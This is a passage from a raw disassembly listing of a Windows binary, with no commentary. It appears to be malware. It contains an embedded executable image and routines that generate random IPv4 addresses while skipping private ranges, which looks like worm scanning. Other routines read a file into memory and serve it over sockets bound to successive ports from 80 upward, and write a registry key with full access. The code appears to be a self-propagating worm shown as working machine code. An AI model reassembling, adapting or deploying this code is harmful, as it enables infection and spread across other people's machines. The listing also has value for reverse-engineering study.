mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43DC4A
sub_43DC5B endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC78 proc near ; CODE XREF: sub_43DA39+3F�p
; .data:0043DBEE�p
jmp dword ptr ds:100050ECh
sub_43DC78 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC84 proc near ; CODE XREF: sub_43DA39+F�p
; sub_43DAF3+7�p ...
jmp dword ptr ds:100050F0h
sub_43DC84 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC90 proc near ; CODE XREF: sub_43D844+10�p
jmp dword ptr ds:100050F4h
sub_43DC90 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC9C proc near ; CODE XREF: .data:0043DB96�p
jmp dword ptr ds:100050F8h
sub_43DC9C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCA8 proc near ; CODE XREF: sub_43D9DA+49�p
jmp dword ptr ds:100050FCh
sub_43DCA8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCB4 proc near ; CODE XREF: sub_43DA39+14�p
; .data:0043DC28�p
jmp dword ptr ds:10005100h
sub_43DCB4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCC0 proc near ; CODE XREF: .data:0043DBD9�p
jmp dword ptr ds:10005104h
sub_43DCC0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCCC proc near ; CODE XREF: sub_43D9DA+16�p
; sub_43DA39+48�p ...
jmp dword ptr ds:10005108h
sub_43DCCC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCD8 proc near ; CODE XREF: sub_43DA39+B0�p
jmp dword ptr ds:1000510Ch
sub_43DCD8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCE4 proc near ; CODE XREF: sub_43DA39+AB�p
jmp dword ptr ds:10005110h
sub_43DCE4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCF0 proc near ; CODE XREF: sub_43D9DA+32�p
jmp dword ptr ds:10005114h
sub_43DCF0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCFC proc near ; CODE XREF: sub_43D662+13�p
jmp dword ptr ds:10005118h
sub_43DCFC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD08 proc near ; CODE XREF: .data:0043DC23�p
jmp dword ptr ds:1000511Ch
sub_43DD08 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD14 proc near ; CODE XREF: sub_43D7AC+33�p
; sub_43D7AC+45�p ...
jmp dword ptr ds:10005128h
sub_43DD14 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD20 proc near ; CODE XREF: sub_43D7AC+B�p
; sub_43D7AC+17�p ...
jmp dword ptr ds:1000512Ch
sub_43DD20 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD44 proc near ; CODE XREF: sub_43D844+58�p
; sub_43D844+96�p
jmp dword ptr ds:10005138h
sub_43DD44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD50 proc near ; CODE XREF: sub_43D930+23�p
jmp dword ptr ds:1000513Ch
sub_43DD50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD68 proc near ; CODE XREF: .data:0043D768�p
jmp dword ptr ds:10005144h
sub_43DD68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD74 proc near ; CODE XREF: sub_43D7AC+71�p
; sub_43D7AC+86�p
jmp dword ptr ds:10005148h
sub_43DD74 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD80 proc near ; CODE XREF: .data:0043DB41�p
jmp dword ptr ds:1000514Ch
sub_43DD80 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD8C proc near ; CODE XREF: sub_43DAF3+14�p
; .data:0043DC12�p
jmp dword ptr ds:10005150h
sub_43DD8C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD98 proc near ; CODE XREF: sub_43D844+B7�p
jmp dword ptr ds:10005154h
sub_43DD98 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aPnpijd32 db 'Pnpijd32',0 ; DATA XREF: sub_403D2D+287�o
aJklmno db 'jklmno',0
aAy db 'Ay&',0
db '\',0
aTtii db '',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 10h
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB_1 db 0Ah
db '|B',0
align 4
aP_2 db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43EBE9 db 4Dh, 5Ah, 90h ; DATA XREF: sub_403BBF+A7�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43F009 proc near ; CODE XREF: .data:0043F141�p
; .data:0043F16F�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43F026: ; CODE XREF: sub_43F009+44�j
; sub_43F009+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43F055
cmp esi, [esp+1Ch+arg_4]
jz short loc_43F055
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43F026
call dword ptr [ebx+esi*4+8]
jmp short loc_43F026
; ---------------------------------------------------------------------------
loc_43F055: ; CODE XREF: sub_43F009+2A�j
; sub_43F009+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43F009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F063 proc near ; CODE XREF: .data:0043F134�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_4407A1
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43F063 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_404088+4, eax
mov dword ptr ds:loc_40408D+3, ebx
test dword ptr [eax+4], 6
jnz loc_43F168
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_40408D+3, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43F0C6: ; CODE XREF: .data:0043F15F�j
cmp esi, 0FFFFFFFFh
jz loc_43F177
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43F156
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402F+1, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404034, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404034+4, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_40403B+1
mov esi, dword ptr ds:loc_404034
rep movsd
lea edi, loc_40403B+1
mov dword ptr ds:loc_404034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43F156
js short loc_43F164
mov edi, [ebx+8]
push ebx
call sub_43F063
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43F009
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43F156: ; CODE XREF: .data:0043F0D7�j
; .data:0043F12C�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43F0C6
; ---------------------------------------------------------------------------
loc_43F164: ; CODE XREF: .data:0043F12E�j
xor eax, eax
jmp short loc_43F1D9
; ---------------------------------------------------------------------------
loc_43F168: ; CODE XREF: .data:0043F0A6�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43F009
add esp, 0Ch
loc_43F177: ; CODE XREF: .data:0043F0C9�j
push 0
mov dword ptr ds:loc_40400F+1, 0Bh
push 0Bh
call sub_440945
add esp, 8
or eax, eax
jnz short loc_43F1B2
push 0
mov dword ptr ds:loc_40400F+1, 8
push 8
call sub_440945
add esp, 8
or eax, eax
jnz short loc_43F1B2
mov eax, 1
jmp short loc_43F1D9
; ---------------------------------------------------------------------------
loc_43F1B2: ; CODE XREF: .data:0043F18F�j
; .data:0043F1A9�j
cmp eax, 0FFFFFFFFh
jz short loc_43F1E1
push eax
push dword ptr ds:loc_40400F+1
call sub_440945
add esp, 8
push dword ptr ds:loc_40400F+1
call sub_44092D
add esp, 4
mov eax, 1
loc_43F1D9: ; CODE XREF: .data:0043F166�j
; .data:0043F1B0�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43F1E1: ; CODE XREF: .data:0043F1B5�j
cmp dword ptr ds:sub_404028+4, 0
jnz short loc_43F1F1
mov eax, 1
jmp short loc_43F1D9
; ---------------------------------------------------------------------------
loc_43F1F1: ; CODE XREF: .data:0043F1E8�j
mov eax, dword ptr ds:sub_404028+4
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_40401C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push offset sub_404028
push 404024h
push 404020h
call sub_4408F1
push dword ptr ds:sub_404028
push dword ptr ds:loc_404023+1
push dword ptr ds:sub_40401C+4
mov dword ptr ds:loc_404014, esp
call sub_440649
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_440909
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F285 proc near ; CODE XREF: sub_43F320+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_4408E5
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43F2A8: ; CODE XREF: sub_43F285+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F2A8
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43F2D0
; ---------------------------------------------------------------------------
loc_43F2BA: ; CODE XREF: sub_43F285+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43F2D0: ; CODE XREF: sub_43F285+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43F2BA
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43F2FC
; ---------------------------------------------------------------------------
loc_43F2EA: ; CODE XREF: sub_43F285+88�j
push 404DE5h
push edi
call sub_440969
add esp, 8
add [ebp+var_3], 1
loc_43F2FC: ; CODE XREF: sub_43F285+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43F2EA
push [ebp+arg_8]
push edi
call sub_440969
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43F285 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F320 proc near ; CODE XREF: sub_440441+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push offset sub_404DE3
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43F285
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_440759
leave
retn
sub_43F320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F345 proc near ; CODE XREF: .data:004403FF�p
; sub_440441+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4408A9
mov edi, eax
or edi, edi
jz short loc_43F375
xor eax, eax
jmp short loc_43F3AD
; ---------------------------------------------------------------------------
loc_43F375: ; CODE XREF: sub_43F345+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_4408D9
mov edi, eax
push [ebp+var_4]
call sub_4408B5
or edi, edi
jz short loc_43F39D
xor eax, eax
jmp short loc_43F3AD
; ---------------------------------------------------------------------------
loc_43F39D: ; CODE XREF: sub_43F345+52�j
cmp [ebp+var_8], 1
jnz short loc_43F3AA
mov eax, 2
jmp short loc_43F3AD
; ---------------------------------------------------------------------------
loc_43F3AA: ; CODE XREF: sub_43F345+5C�j
xor eax, eax
inc eax
loc_43F3AD: ; CODE XREF: sub_43F345+2E�j
; sub_43F345+56�j ...
pop edi
leave
retn
sub_43F345 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F3B0 proc near ; CODE XREF: .data:004403D8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4408C1
mov edi, eax
or edi, edi
jz short loc_43F3D5
xor eax, eax
jmp short loc_43F400
; ---------------------------------------------------------------------------
loc_43F3D5: ; CODE XREF: sub_43F3B0+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_4408CD
mov edi, eax
push [ebp+var_4]
call sub_4408B5
or edi, edi
jz short loc_43F3FD
xor eax, eax
jmp short loc_43F400
; ---------------------------------------------------------------------------
loc_43F3FD: ; CODE XREF: sub_43F3B0+47�j
xor eax, eax
inc eax
loc_43F400: ; CODE XREF: sub_43F3B0+23�j
; sub_43F3B0+4B�j
pop edi
leave
retn
sub_43F3B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_440601
cmp eax, 0FFFFFFFFh
jz loc_43F547
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_440981
add esp, 8
or eax, eax
jz loc_43F509
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_440981
add esp, 8
or eax, eax
jz loc_43F509
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_44060D
push dword ptr ds:loc_403004
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_440951
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43F49C: ; CODE XREF: .data:0043F4A1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F49C
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_44060D
loc_43F4B5: ; CODE XREF: .data:0043F4FB�j
mov eax, dword ptr ds:loc_403004
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43F4CB
mov edi, 1000h
loc_43F4CB: ; CODE XREF: .data:0043F4C4�j
or edi, edi
jz short loc_43F4FD
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403006+2
push eax
push dword ptr [ebp+8]
call sub_44060D
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43F547
cmp esi, 1000h
jb short loc_43F4FD
add ebx, esi
push 64h
call sub_4407B9
jmp short loc_43F4B5
; ---------------------------------------------------------------------------
loc_43F4FD: ; CODE XREF: .data:0043F4CD�j
; .data:0043F4F0�j
push 404098h
call sub_440771
jmp short loc_43F52B
; ---------------------------------------------------------------------------
loc_43F509: ; CODE XREF: .data:0043F446�j
; .data:0043F462�j
push 0
push 15h
push offset sub_404D70
push dword ptr [ebp+8]
call sub_44060D
push 0
push 0Dh
push offset sub_40409C
push dword ptr [ebp+8]
call sub_44060D
loc_43F52B: ; CODE XREF: .data:0043F507�j
push 7D0h
call sub_4407B9
push 2
push dword ptr [ebp+8]
call sub_440619
push dword ptr [ebp+8]
call sub_4405A1
loc_43F547: ; CODE XREF: .data:0043F42A�j
; .data:0043F4E8�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push 404098h
call sub_440765
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push 403010h
call sub_440789
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43F58D
push 1
call sub_4406F9
loc_43F58D: ; CODE XREF: .data:0043F584�j
push 0
push ebx
call sub_44071D
mov dword ptr ds:loc_403004, eax
push eax
push 0
call sub_44077D
mov dword ptr ds:loc_403006+2, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403004
push dword ptr ds:loc_403006+2
push ebx
call sub_440795
push ebx
call sub_440735
push 0
push 1
push 2
call sub_440625
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_4407AD
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43F5ED: ; CODE XREF: .data:0043F62D�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404094, ax
movzx eax, word ptr ds:loc_404094
push eax
call sub_4405D1
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_440595
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43F62F
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43F5ED
loc_43F62F: ; CODE XREF: .data:0043F622�j
push 64h
push esi
call sub_4405F5
mov dword ptr [ebp-4], 10h
loc_43F63E: ; CODE XREF: .data:0043F669�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_440589
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_4407DD
push eax
call sub_440735
jmp short loc_43F63E
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F670 proc near ; CODE XREF: .data:0043FEA3�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, loc_4040A6+4
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B8+2
mov ecx, 5
rep movsb
loc_43F699: ; CODE XREF: sub_43F670+51�j
; sub_43F670+74�j
call sub_440939
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43F6EA
; ---------------------------------------------------------------------------
loc_43F6B6: ; CODE XREF: sub_43F670+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43F699
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43F6E6
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43F6E6
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43F699
loc_43F6E6: ; CODE XREF: sub_43F670+5A�j
; sub_43F670+6B�j
inc [ebp+var_2]
loc_43F6EA: ; CODE XREF: sub_43F670+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43F6B6
loc_43F6F3: ; CODE XREF: sub_43F670+AC�j
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43F71E
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43F6F3
loc_43F71E: ; CODE XREF: sub_43F670+A1�j
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_440939
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_440951
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43F670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F771 proc near ; CODE XREF: .data:004400A8�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
